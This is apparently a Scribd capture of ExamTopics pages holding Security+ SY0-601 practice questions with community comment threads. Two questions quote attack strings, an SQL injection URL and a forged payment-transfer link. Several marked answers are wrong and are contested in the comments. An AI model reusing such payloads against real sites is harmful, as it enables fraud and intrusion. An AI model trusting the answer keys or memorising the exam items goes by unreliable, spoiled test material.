Scribd
Upload
77 views

SY0-601 Exam - Update 23 Januari 2023

Uploaded by

dapismurf1
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
77 views

SY0-601 Exam - Update 23 Januari 2023

Uploaded by

dapismurf1
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 539

2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

- Expert Verified, Online, Free.

 Custom View Settings

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 1/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Topic 1 - Single Topic

Question #1 Topic 1

A user is attempting to navigate to a website from inside the company network using a desktop. When the user types in the URL,
https://www.site.com, the user is presented with a certificate mismatch warning from the browser. The user does not receive a warning when
visiting http://www.anothersite.com. Which of the following describes this attack?

A. On-path

B. Domain hijacking

C. DNS poisoning

D. Evil twin

Correct Answer: B

Community vote distribution


C (62%) B (19%) Other

  comeragh Highly Voted  5 months ago


Selected Answer: C
I would go with C/DNS poisoning here.
upvoted 13 times

  SolventCourseisSCAM Highly Voted  3 months, 3 weeks ago


C is the correct answer. By the way, there is a course in north carolina and they are receiving $4000 in advance and showing you 6-hour pre-
recorded videos every saturday. There is no human intervention and no update over time. They are lying and giving you fake promises before
signing up to course and then there is no contact after you became member. Be careful because they are completely SCAMMER.
upvoted 10 times

  DALLASCOWBOYS Most Recent  1 day, 9 hours ago


This is confirmed as Domain Hijacking
upvoted 3 times

  DALLASCOWBOYS 1 day, 9 hours ago


Due to getting the server warning on the one site and not the other site. If it was DNS Posioning, there would be a redirection to a malicious
website. The question does not station that they were redirected, it just stated they did not get the cert warning on the other site. So site.com
was domain hijacked
upvoted 1 times

  Tornike 3 days, 22 hours ago


I took the exam yesterday, I only got 5-10% of these questions!
Total 82 questions
upvoted 2 times

  Iwannabeabadasshacker 2 days, 13 hours ago


bruh u used contributor access ?
upvoted 1 times

  EduardosSS 18 hours, 50 minutes ago


what is contributor access?
upvoted 1 times

  Tornike 2 days, 5 hours ago


YES, I used contributor access
upvoted 1 times

  thisguyfucks 5 days, 8 hours ago


Now looking at it:Domain Name Server (DNS) hijacking, also named DNS redirection, is a type of DNS attack in which DNS queries are incorrectly
resolved in order to unexpectedly redirect users to malicious sites.

Domain Hijacking or Domain Spoofing is an attack where an organization's web address is stolen by another party. The other party changes the
enrollment of another's domain name without the consent of its legitimate owner. This denies true owner administrative access.

Seems like DNS poisoning is the best answer, what is confusing is that the site actually said domain hijacking was correct but after lookin this
over I believe they are wrong.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 2/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  thisguyfucks 5 days, 9 hours ago


This is extremely confusing, is it domain hijacking or dns poisoning? How can we differentiate with this ongoing discussion that seems split.
upvoted 2 times

  DALLASCOWBOYS 6 days, 22 hours ago


This a poorly worded question or some information is missing. It doesn't indicate the user proceeded to site.com, just indicates she received a
warning. Then it doesn't say user was redirected to anothersite.com, just indicates she did not receive a warning when visiting the other site. It
seems like there is something missing that is not presented in the question listed. I have wasted too much time researching this.
upvoted 2 times

  DuoIsAlive 1 week ago


Selected Answer: A
ChatGPT
This issue is likely caused by a "Man-in-the-Middle (MitM)" attack, also known as an "On-path" attack. In this type of attack, an attacker
intercepts the communication between the user and the website, and presents a fake certificate to the user. This can happen if the attacker is
able to intercept the user's traffic, for example by being on the same network or by compromising a router or other network device.

The user is presented a certificate mismatch warning because the certificate presented by the attacker does not match the expected certificate
for the website, and the browser is warning the user that the website may not be the one they intended to visit.

Option A. On-path correctly describes the attack.


upvoted 1 times

  TheITguru 1 week, 1 day ago


This domain hijacking. Where people seem to be confused is that one method to accomplish this is through DNS poisoning... but that's just one
method of attack and the answer domain hijacking would always be true to describe this, vs dns poisoning would maybe be true. Always go with
the MOST RIGHT ANSWER! Yes, you could try to take over the certificate, but there are a number of real world examples that show certificate
mismatch after domain hijacking. Don't assume anything. Go off the question and choose the most right option. In this case its domain hijacking
since it could always be used to describe this behavior. Wheras DNS would only sometimes be used to create a scenario like this.
upvoted 1 times

  Chaz71 1 week, 1 day ago


Selected Answer: C
Seems like DNS
upvoted 2 times

  TinyTrexArmz 1 week, 2 days ago


Selected Answer: C
I believe both B and C could result in the experience described but with domain hijacking the attacker has a better change of tricking a Certificate
Authority into providing/reissuing a trusted certificate. With DNS Poisoning it seems very unlikely a trusted certificate could be taken and used on
the server traffic is being redirected to.
upvoted 1 times

  shi_ 1 week, 2 days ago


i would say it is C, I've read many solutions and concluded it.
one of the clear explanations was you can't do DNS poisoning on HTTPS site means that if you've done it there will be 2 options, you send your
self signed certificate or u use the original certificate but if you use the original means you can't get the private key (means no dns poisoning)
so you send your self-generated certificate and it comes out as a warning that the certificate is not verified (if you choose to ignore the warning
then you've succeeded)
upvoted 2 times

  shi_ 1 week ago


adding it, domain hijacking means that you hijacked a domain and using that domain to make a fake website acting as the real one, it is
possible for a fake website to have a valid certificate however to support my statement, dns poisoning on https site means that you have a
certificate mismatch (look at the question, you go to HTTPS and it said certificate mismatch)
upvoted 1 times

  amadeosmith 1 week, 3 days ago


I have the exam soon, could someone clarify what is the correct answer. The one most voted or the selected one? Thx
upvoted 1 times

  ronniehaang 1 week, 6 days ago


Selected Answer: C
This looks like a Pharming attack conducted by DNS poisoning
upvoted 1 times

  Chris518 2 weeks ago


Selected Answer: B
I feel like both (C) and (B) are correct answers but (C) is specific and the method is given while (B) is broad and can include DNS poisoning as
Hijacking goes one step further and changes the DNS settings while DNS Poisoning only redirects the traffic using the DNS records so unless
they give some specification on what is going on behind the scenes we cannot determine the answer between (B) and (C)
upvoted 2 times

  bsComptia 2 weeks, 4 days ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 3/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

This chatGPTs answer: It is difficult to determine which attack is most likely based on the information provided. Both a man-in-the-middle (MITM)
and DNS poisoning attack would involve redirecting traffic to a malicious site and would result in a certificate mismatch warning. A domain
hijacking attack would also result in traffic being redirected to a malicious site, but in this case, the attacker would have taken control of the
domain name rather than intercepting the traffic.

It would be best to investigate the issue further by looking at the network traffic, verifying the SSL/TLS certificate, checking the DNS records and
also checking the domain registration details. It would also be helpful to check whether the company has adequate security measures in place,
such as firewalls and intrusion detection systems, to detect and prevent this type of attack.
upvoted 2 times

  TheITguru 1 week, 1 day ago


Chat GPT seems confused, there is no reference to intercepting traffic in the question. Without that to argue against, Domain Hijacking is the
best answer of those available because it fits the scenario without assuming anything, and the attack described is definately a form of Domain
Hijacking since the url is correct. It COULD be DNS poisining, BUT there is no description of how this DNS attack would have worked. The
question clearly asks what kind of attack this is. Where does it describe DNS being hacked, without assuming anything?
This is test taking strategy. Don't assume anything!
upvoted 2 times

  emma234 3 weeks, 1 day ago


how do i know the correct answer
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 4/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #2 Topic 1

Which of the following tools is effective in preventing a user from accessing unauthorized removable media?

A. USB data blocker

B. Faraday cage

C. Proximity reader

D. Cable lock

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
USB data blocker ->

A USB data blocker, also known as a “USB condom” (really, no kidding!), is a device that allows you to plug into USB charging ports including
charging kiosks, and USB ports on gadgets owned by other people.

The main purpose of using one is to eliminate the risk of infecting your phone or tablet with malware, and even prevent hackers to install/execute
any malicious code to access your data.
upvoted 9 times

  comeragh Highly Voted  5 months ago


Selected Answer: A
A is the only reasonable answer here I believe
upvoted 9 times

  Proctored_Expert Most Recent  1 month, 2 weeks ago


Selected Answer: A
One tool that is effective in preventing a user from accessing unauthorized removable media is a USB data blocker.

A USB data blocker is a device that is designed to block data transfer between a USB device and a computer, while still allowing power to flow
through the connection. This can be useful in preventing users from accessing unauthorized removable media, such as USB drives, external hard
drives, and other types of storage devices.
upvoted 1 times

  aktion 1 month, 3 weeks ago


Selected Answer: A
A is the answer. The ramianing options do not meet the requirements as depicted in the question
upvoted 1 times

  Nirmalabhi 3 months ago


Selected Answer: A
correct answer should be A.
upvoted 1 times

  JohnMangley 4 months ago


Selected Answer: A
Only A would prevent a user from accessing unauthorized removable media
upvoted 2 times

  Ribeiro19 5 months, 1 week ago


Selected Answer: A
It's the only one that don´t let you receive info from the usb. (removes the RX and TX from the cable | only let energy pass on the USB cable)
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 5/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #3 Topic 1

A Chief Security Officer is looking for a solution that can provide increased scalability and flexibility for back-end infrastructure, allowing it to be
updated and modified without disruption to services. The security architect would like the solution selected to reduce the back-end server
resources and has highlighted that session persistence is not important for the applications running on the back-end servers. Which of the
following would BEST meet the requirements?

A. Reverse proxy

B. Automated patch management

C. Snapshots

D. NIC teaming

Correct Answer: C

Community vote distribution


A (95%) 5%

  ender1701 Highly Voted  5 months ago


Selected Answer: A
I'm not sure who the "expert verifier" is for some of these answers, but there are multiple questions that have the wrong answer selected, such as
this question being labeled as answer "C", when the real answer is "A". A snapshot doesn't do anything listed in the question, it's just a snap of
the state of a server at a specific time, used to restore from backup. I advise all participants on this site to check your answers.
upvoted 18 times

  ronah 3 months, 3 weeks ago


here is the thing about this website. the comptia allow these sites as long they don't give the right answer. This is the only place people made
a comment or argue their answer. AND it does help you to search also the right answer. Where on earth do you get a questions like these?
upvoted 13 times

  Ribeiro19 Highly Voted  5 months, 1 week ago


Selected Answer: A
its the way to distribute load across different servers, at the same time you can remove from the cluster each server that you want to update.
upvoted 16 times

  Papee 3 months, 2 weeks ago


why this is not NIC Teaming ? Any body with a better explanation
upvoted 1 times

  Mercious 2 weeks, 3 days ago


They're looking for ways to provide increased scalability and flexibility for back-end infrastructure, not availability or fault tolerance. NIC
Teaming does not provide increased scalability and flexibility.
upvoted 1 times

  nerdboy1992 1 month, 3 weeks ago


NIC Teaming combines the throughput of 2 or more network adapters to provide a higher speed than a single connection. This would help
with increasing the speed, but the requirements between the CSO and architect were increase scalability, increase flexibility, allowed to
make changes without service disruption, reduce back-end server resources, and session persistence being insignificant for the backend
applications. Since increased speed is not a requirement, NIC Teaming would NOT be the correct answer.
upvoted 2 times

  Joe1984 5 months ago


Agreed answer is A
upvoted 4 times

  thisguyfucks 4 days, 7 hours ago


Most Recent 
Its going to be A reverse proxy.
upvoted 1 times

  TinyTrexArmz 1 week, 2 days ago


Selected Answer: A
While Reverse Proxy is not in of itself a load balancer you can tell it a group of servers to direct traffic to. The problem is that since it's not a load
balancer there's not a lot of intelligence to them in session management. In some cases some web applications require that they talk to the same
webserver throughout the session. In the case of a reverse proxy it's going to sudu randomly direct each request to an available server which is
why the part about session reliability is in there. But as long as your pool of servers available can handle the amount of requests coming in you
can simply remove one or more from the pool and update them without messing up your users experience.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 6/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  Chris518 2 weeks ago


Selected Answer: C
This is tricky as (C) is not the BEST way but just the BEST out of the given options especially (A) is tricky as Reverse proxy while you can use it to
accomplish this. The capability to allow the version to update separately from any other service would be to take a Snapshot as Reverse proxy is
often notorious for breaking during updates as most reverse proxies are hardcoded to the current version.
upvoted 1 times

  Sandon 1 week, 1 day ago


Not even close
upvoted 1 times

  Zigster 1 month ago


Correct answer is A
upvoted 1 times

  Proctored_Expert 1 month, 2 weeks ago


Selected Answer: A
A reverse proxy would best meet the requirements described.

A reverse proxy is a type of server that sits between a client and the back-end servers, forwarding requests from clients to the appropriate back-
end server and returning the response from the back-end server to the client. Reverse proxies can provide increased scalability and flexibility for
back-end infrastructure, as they allow the back-end servers to be updated and modified without disruption to services. They can also reduce the
load on back-end servers by offloading certain tasks, such as SSL termination, caching, and load balancing.

In this case, the security architect has highlighted that session persistence is not important for the applications running on the back-end servers,
indicating that a reverse proxy would be an appropriate solution.
upvoted 1 times

  nerdboy1992 1 month, 3 weeks ago


NIC Teaming combines the throughput of 2 or more network adapters to provide a higher speed than a single connection. This would help with
increasing the speed, but the requirements between the CSO and architect were increase scalability, increase flexibility, allowed to make changes
without service disruption, reduce back-end server resources, and session persistence being insignificant for the backend applications. Since
increased speed is not a requirement, NIC Teaming would NOT be the correct answer.
upvoted 1 times

  okay123 1 month, 3 weeks ago


"The major benefit of load balancer scaling is that it provides scalability. Scalability is the ability of a networking device or application to handle
organic and planned network growth."

https://network-insight.net/2015/02/26/load-balancing-and-scale-out-
architectures/#:~:text=The%20major%20benefit%20of%20load,organic%20and%20planned%20network%20growth.
upvoted 1 times

  TonicMail 2 months, 3 weeks ago


It can be C as "has highlighted that session persistence is not important for the applications"
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Reverse Proxy - A reverse proxy is an application/server that sits in front of a web server that processes and forwards incoming client requests to
the appropriate server(s). This prevents the client from connecting directly to the origin server.
In this question, the officer needs to provide " increased scalability and flexibility for back-end infrastructure". Organizations can use a reverse
proxy to distribute traffic evenly and efficiently across multiple backend servers, if they want. This can prevent site shutdowns as traffic can be
rerouted to an alternative server instead of relying on one server. At the same time, you can choose to remove the server from production when
maintenance is needed without affecting the service.
upvoted 6 times

  Belayet 4 months, 2 weeks ago


Selected Answer: C
allowing it to be updated and modified without disruption to services
upvoted 2 times

  Mondicles 4 months, 2 weeks ago


Selected Answer: A
The key here is "reduce the back-end server resources". A reverse proxy maintains the load over the servers by redirecting an adequate amount
of traffic towards it.
upvoted 4 times

  comeragh 5 months ago


Selected Answer: A
In computer networks, a reverse proxy is the application that sits in front of back-end applications and forwards client requests to those
applications. Reverse proxies help increase scalability, performance, resilience and security
upvoted 7 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 7/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #4 Topic 1

Which of the following describes a social engineering technique that seeks to exploit a person's sense of urgency?

A. A phishing email stating a cash settlement has been awarded but will expire soon

B. A smishing message stating a package is scheduled for pickup

C. A vishing call that requests a donation be made to a local charity

D. A SPIM notification claiming to be undercover law enforcement investigating a cybercrime

Correct Answer: C

Community vote distribution


A (88%) 10%

  Joe1984 Highly Voted  5 months ago


Selected Answer: A
Answer is A
upvoted 16 times

  derfnick Highly Voted  5 months ago


Selected Answer: A
Because of the part "will expire soon"
upvoted 9 times

  thisguyfucks Most Recent  19 hours, 4 minutes ago


Selected Answer: A
ITS "A"
upvoted 1 times

  thisguyfucks 4 days, 7 hours ago


Selected answer is A
upvoted 1 times

  DALLASCOWBOYS 6 days, 21 hours ago


A. expires soon
upvoted 1 times

  Nader_Wagih 1 week, 1 day ago


answer is A
upvoted 1 times

  Chris518 2 weeks ago


Selected Answer: A
What is with the answer it is insane
upvoted 1 times

  papahawaii 2 weeks ago


A- urgency being the key word. Who cares about some random donation to a charity, no urgency in that.
upvoted 1 times

  cryptodkey 2 weeks, 3 days ago


for me the type doesn't really matter now because both mail and call has disadvantages over each other so what matters now is the character
trait involve. and A has the character trait of urgency "will soon expire" but the call only request for a donation without any urgency involved. so i
go A
upvoted 1 times

  Mercious 2 weeks, 3 days ago


Selected Answer: A
I think A is correct because of the will expire soon. Sense of urgency is time based and that's the only answer with such an actionable word.
upvoted 1 times

  Proctored_Expert 1 month, 2 weeks ago


Selected Answer: A
A phishing email stating a cash settlement has been awarded but will expire soon describes a social engineering technique that seeks to exploit a
person's sense of urgency.

Social engineering is the use of psychological manipulation or deception to influence people to divulge sensitive information or take actions that
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 8/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

may not be in their best interests. One common social engineering technique is to create a sense of urgency in the victim, often by using time-
limited offers or other time-sensitive incentives.

In this case, the phishing email claims that a cash settlement has been awarded, but will expire soon, creating a sense of urgency in the victim to
take action. This may motivate the victim to click on a link or provide sensitive information, without fully considering the consequences.
upvoted 1 times
  AidenB4704 1 month, 2 weeks ago
what should I pick on the actual test? I know it should be A but if I get this question should I pick A or C?
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
A phishing email stating a cash settlement has been awarded but will expire soon

Explanation: A social engineering technique that seeks to exploit a person's sense of urgency would be to send a phishing email stating that a
cash settlement has been awarded, but that it will expire soon if the recipient does not act quickly. This creates a sense of urgency in the
recipient, who may be more likely to click on a link or provide personal information in order to claim the settlement.

B. A smishing message stating a package is scheduled for pickup


C. A vishing call that requests a donation be made to a local charity
D. A SPIM notification claiming to be undercover law enforcement investigating a cybercrime

All of these options could potentially be used as social engineering techniques, but they do not specifically seek to exploit a person's sense of
urgency.
upvoted 1 times

  sauna28 1 month, 3 weeks ago


Selected Answer: A
A. Urgency when good /baddeal is coming up to you, and you need to address/grab it fast within a period of time
upvoted 1 times

  njinnc1123 1 month, 4 weeks ago


A is correct answer
upvoted 1 times

  Renfri 2 months ago


This is literally common sense
upvoted 1 times

  kerncc1 2 months ago


What about the fact that an email is not even guaranteed to be seen by the receiver. There's tons of emails in my inbox or spam folder that I
never even see for days or weeks. A phone call is something that you will get immediately if not at least you will receive a message. I don't know
if that has anything to do with it
upvoted 3 times

  Mr_BuCk3th34D 1 month, 3 weeks ago


Has nothing to do with it, the "sense of urgency" is not related to the social engineering method itself, but with the content of the message.
You're imposing your own context and personal opinion to a question that it was supposed to be generic. If you think about it, a phone call
might have the same issue, on my personal case for example, I don't accept calls from unknown numbers, what does that change with
regards to the sense of urgency being exploited? In a nutshell, it's not about the method, but the message itself.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 9/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #5 Topic 1

A security analyst is reviewing application logs to determine the source of a breach and locates the following log:
https://www.comptia.com/login.php?id='%20or%20'1'1='1
Which of the following has been observed?

A. DLL Injection

B. API attack

C. SQLi

D. XSS

Correct Answer: C

Community vote distribution


C (100%)

  Joe1984 Highly Voted  5 months ago


Selected Answer: C
1=1 is true. SQL injection
upvoted 12 times

  DALLASCOWBOYS Most Recent  6 days, 21 hours ago


C. '1'1=1 indicator i=of an SQL injection
upvoted 1 times

  xxxdolorxxx 2 weeks, 4 days ago


Selected Answer: C
I vote for C
upvoted 1 times

  Proctored_Expert 1 month, 2 weeks ago


Selected Answer: C
SQLi (SQL injection) has been observed.

SQL injection is a type of cyber attack that involves injecting malicious code into a database through a vulnerable web application. The malicious
code is typically designed to manipulate or extract data from the database, allowing the attacker to gain unauthorized access to sensitive
information.

The log provided in the question appears to be a URL for a login page, with a string of text appended to the end. This string includes the text "or
'1'1='1", which is a common syntax used in SQL injection attacks. This indicates that an SQL injection attack may have been attempted or
successfully carried out against the website.
upvoted 2 times

  sauna28 1 month, 3 weeks ago


Selected Answer: C
1=1 is SQL INJECTION
upvoted 1 times

  BillHealy 3 months, 3 weeks ago


Selected Answer: C
Sql injection attempt
upvoted 1 times

  DCrest 4 months, 2 weeks ago


In an SQL injection attack, when a hacker enters " ' or 1 = 1 - - " in the user name and password field, why does this result in a successful login?
3 answers

16 votes:
The server interprets everything after the “—” as a comment, so ignores it.
upvoted 3 times

  comeragh 5 months ago


Selected Answer: C
SQL injection for sure agreed.
upvoted 3 times
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 10/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  stoneface 5 months, 1 week ago


Selected Answer: C
SQL Injection (SQLi) is a type of an injection attack that makes it possible to execute malicious SQL statements. These statements control a
database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures.
upvoted 2 times

  Ribeiro19 5 months, 1 week ago


Selected Answer: C
reason id='%20or%20'1'1='1
upvoted 2 times

  nobro1122 5 months, 1 week ago


This is correct.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 11/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #6 Topic 1

An audit identified PII being utilized in the development environment of a critical application. The Chief Privacy Officer (CPO) is adamant that this
data must be removed; however, the developers are concerned that without real data they cannot perform functionality tests and search for
specific data. Which of the following should a security professional implement to BEST satisfy both the CPO's and the development team's
requirements?

A. Data anonymization

B. Data encryption

C. Data masking

D. Data tokenization

Correct Answer: A

Community vote distribution


A (70%) C (27%)

  Boogie_79 Highly Voted  5 months ago


Selected Answer: A
Data anonymization is the alteration process of personally identifiable information (PII) in a dataset, to protect individual identification. This way
the data can be used and still be protected.
upvoted 16 times

  TinyTrexArmz 1 week, 1 day ago


I agree this is the right answer in this case because Data Masking would not allow them to search for specific data results. BUT as a protector
of privacy you should be careful when implementing this solution as it takes a certain amount of data to truly make it to where a data analyst
cannot figure out individuals. (Source: My partner is a data analyst and she has to approve the use of anonymized data before it can be used
for testing such as this)
upvoted 1 times

  Proctored_Expert Highly Voted  1 month, 2 weeks ago


Selected Answer: C
Data masking would best satisfy both the CPO's and the development team's requirements.

Data masking is a technique for obscuring sensitive data in a database or other data store, while still preserving the structure and format of the
data. Data masking can be used to protect personally identifiable information (PII) or other sensitive data from being accessed or exposed in the
development environment.

In this case, the CPO is concerned about PII being utilized in the development environment, and is adamant that it must be removed. At the same
time, the development team needs real data in order to perform functionality tests and search for specific data. Data masking would allow the
CPO's requirement to be satisfied, while still providing the development team with real data to work with.
upvoted 5 times

  thisguyfucks Most Recent  1 day, 10 hours ago


Correct answer is C:
-Data masking[1][2] or data obfuscation[3] is the process of modifying sensitive data in such a way that it is of no or little value to unauthorized
intruders while still being usable by software or authorized personnel
upvoted 1 times

  thisguyfucks 1 day, 19 hours ago


I believe the correct answer is C please read the following:
Data masking is a way to create a fake, but a realistic version of your organizational data. The goal is to protect sensitive data, while providing a
functional alternative when real data is not needed—for example, in user training, sales demos, or software testing.
upvoted 1 times

  Nader_Wagih 1 week, 1 day ago


Selected Answer: A
Answe is A
upvoted 1 times

  shi_ 1 week, 2 days ago


based on what I've read on the internet, my opinion would be A
both do protect data but it is said data masking is used when real data is not needed
upvoted 1 times

  mlonz 2 weeks, 6 days ago


Data Masking hides sensitive data by permanently replacing it with in inauthentic data.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 12/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Anonymization attempts to permanently remove all PII within a data set to protect data set to protect the privacy of individuals.
upvoted 1 times
  asum 3 weeks, 2 days ago
Selected Answer: C
C. Data masking can mean that all or part of the contents of a field are redacted,
by substituting all character strings with "x" for example. A field might be partially
redacted to preserve metadata for analysis purposes. For example, in a telephone
number, the dialing prefix might be retained, but the subscriber number redacted.
Data masking can also use techniques to preserve the original format of the field. Data
masking is an irreversible deidentification technique
upvoted 3 times

  Sandon 1 week, 1 day ago


That ain't it
upvoted 1 times

  creepyvirus 1 month, 2 weeks ago


data masking could be used to remove PII from the development environment, while still allowing the development team to perform functionality
tests and search for specific data. This would enable the team to continue testing and developing the critical application, while also satisfying the
CPO's requirement to protect PII.

The other options listed (Data anonymization, Data encryption, and Data tokenization) may not fully address the specific requirements of this
scenario and may not allow the development team to test functionality and search for specific data.
upvoted 2 times

  shitgod 1 month, 2 weeks ago


The correct answer is definitely C...I'm a security beginner with a programming background. If the format of the data is part of the logic, the
program is not going to work if you take away the data.
upvoted 2 times

  viksap 1 month, 2 weeks ago


Selected Answer: A
Anonymization of data can still be used with in the system but can’t be revert back to it’s original form. Just verified this by watch Comptia
security plus Andrew Ramdayal video
upvoted 1 times

  Jimbobilly 1 month, 2 weeks ago


Selected Answer: C
Data anonymization is different from data masking in that it involves permanently removing the PII from the data, making it impossible to recover.
This means that the data is no longer realistic or usable for testing or development purposes.
upvoted 2 times

  Sandon 1 week, 1 day ago


Not even close
upvoted 1 times

  boog 1 month, 3 weeks ago


"without real data they cannot perform functionality tests and search for specific data"
anonymization changes the data and makes it unusable for these requirements.
C. Data masking
upvoted 1 times

  sauna28 1 month, 3 weeks ago


Selected Answer: A
YES DATA ANON. Tokenization only used for carddetails
upvoted 1 times

  Ranaer 2 weeks ago


This is not true. Yes tokenization is used for CC details, but that doesnt mean its restricted only for that. Tokenization is widely used for SSN
aswell.
upvoted 1 times

  tek7ila 2 months ago


Selected Answer: A
Ensuring full anonymization and preserving the

utility of data for analysis is usually very difficult, however. Consequently, pseudo anonymization methods are typically used instead. Pseudo-
anonymization modifies
or replaces identifying information so that reidentification depends on an alternate

data source, which must be kept separate. With access to the alternated data, pseudo anonymization methods are reversible
upvoted 1 times

  Blueteam 2 months, 2 weeks ago


The correct answer is C. Data masking
The main reason for applying masking to a data field is to protect data that is classified as personally identifiable information, sensitive personal
data, or commercially sensitive data. However, the data must remain usable for the purposes of undertaking valid test cycles.
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 13/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 2 times
  Nirmalabhi 2 months, 3 weeks ago
Selected Answer: A
Correct answer is Data Anonymization
upvoted 1 times

Question #7 Topic 1

A company is implementing a DLP solution on the file server. The file server has PII, financial information, and health information stored on it.
Depending on what type of data that is hosted on the file server, the company wants different DLP rules assigned to the data. Which of the
following should the company do to help accomplish this goal?

A. Classify the data.

B. Mask the data.

C. Assign the application owner.

D. Perform a risk analysis.

Correct Answer: A

Community vote distribution


A (100%)

  Ribeiro19 Highly Voted  5 months, 1 week ago


Selected Answer: A
Classify the data. permit to DLP distinguish the types of data, with intended to apply different rules depending on the classification.
upvoted 9 times

  stoneface Highly Voted  5 months, 1 week ago


Data classification and typing schemas tag data assets so that they can be managed through the information life cycle. A data classification
schema is a decision tree for applying one or more tags or labels to each data asset. Many data classification schemas are based on the degree
of confidentiality required:

Public (unclassified)—there are no restrictions on viewing the data. Public information presents no risk to an organization if it is disclosed but
does present a risk if it is modified or not available.
Confidential (secret)—the information is highly sensitive, for viewing only by approved persons within the owner organization, and possibly by
trusted third parties under NDA.
Critical (top secret)—the information is too valuable to allow any risk of its capture. Viewing is severely restricted.
upvoted 8 times

  thisguyfucks Most Recent  19 hours, 11 minutes ago


Its going to be A - Data classification is the process an organization follows to develop an understanding of its information assets, assign a value
to those assets, and determine the effort and cost required to properly secure the most critical of those information assets.
upvoted 1 times

  sauna28 1 month, 3 weeks ago


Selected Answer: A
Classify data is no 1 before you proceed to the step
upvoted 1 times

  tek7ila 2 months, 1 week ago


Selected Answer: A
Yep, fully agree with A. The other options make no sense
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 14/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #8 Topic 1

A forensics investigator is examining a number of unauthorized payments that were reported on the company's website. Some unusual log entries
show users received an email for an unwanted mailing list and clicked on a link to attempt to unsubscribe. One of the users reported the email to
the phishing team, and the forwarded email revealed the link to be:
<a href="https://www.company.com/payto.do?routing=00001111&acct=22223334&amount=250">Click here to unsubscribe</a>
Which of the following will the forensics investigator MOST likely determine has occurred?

A. SQL injection

B. Broken authentication

C. XSS

D. XSRF

Correct Answer: B

Community vote distribution


D (95%) 5%

  dylansmith064 Highly Voted  8 months, 4 weeks ago


CSRF or XSRF redirects you to something you didn't intend to go to when clicking a link
upvoted 32 times

  fboy 8 months, 2 weeks ago


thank you!
upvoted 2 times

  comeragh Highly Voted  5 months ago


Selected Answer: D
Going with D also. Funds out of a bank account in most cases indicates CSRF.
upvoted 6 times

  BeOr Most Recent  5 days, 23 hours ago


Hello Guys,
Anyone here passed the exam using this website? It has a very very bad reviews as shown here. Please let me know. They say the questions are
outdated.
https://www.trustpilot.com/review/www.examtopics.com
upvoted 1 times

  DALLASCOWBOYS 6 days, 21 hours ago


Definitely D. XSRF. The malicious link hides its true intention. Link suggested to unsubscribe, but it's true intent was to transfer money out of
account.
upvoted 1 times

  Proctored_Expert 1 month, 2 weeks ago


Selected Answer: C
The forensics investigator will most likely determine that XSS (cross-site scripting) has occurred.

XSS is a type of cyber attack that involves injecting malicious code into a website or web application, with the goal of executing the code in the
context of the victim's browser. XSS attacks can be used to steal sensitive information, such as login credentials or personal data, or to
manipulate the behavior of the website or application.

The log entry provided in the question describes a link that was included in an email, which was clicked on by a user in an attempt to
unsubscribe from an unwanted mailing list. Upon investigation, the forwarded email revealed that the link contained malicious code, specifically
an XSS attack. This indicates that an XSS attack was carried out against the company's website.
upvoted 1 times

  hieptran 1 month ago


Wrong, CSRF utilized the current user session and use them to invoke the request on behalf of the victim.
In this example, there is no malicious javascript payload that indicates there is a Reflected XSS vulnerability in their website.
XSS is often used for session/cookie hijacking. But not this case.
upvoted 3 times

  nul8212 1 month, 2 weeks ago


Selected Answer: D
• Cross-Site Request Forgery (CSRF): This is known as CSRF or XSRF. The user

must be authenticated to the webserver where the user clicks on a link, like, or share

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 15/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

button to act.
CSRF could be used to make purchases, make a bank transfer, or change
a password.
upvoted 2 times
  Jossie_C 3 months ago
Xsrf is cross-site request forgery...speaks for itself
upvoted 2 times

  DoDaResearch 3 months, 1 week ago


